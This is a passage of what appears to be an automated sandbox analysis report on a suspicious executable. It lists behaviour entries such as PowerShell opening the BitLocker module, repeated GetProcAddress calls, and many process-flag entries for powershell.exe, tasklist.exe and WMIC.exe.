              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB1E50B0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00007FF6FB1E50B0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
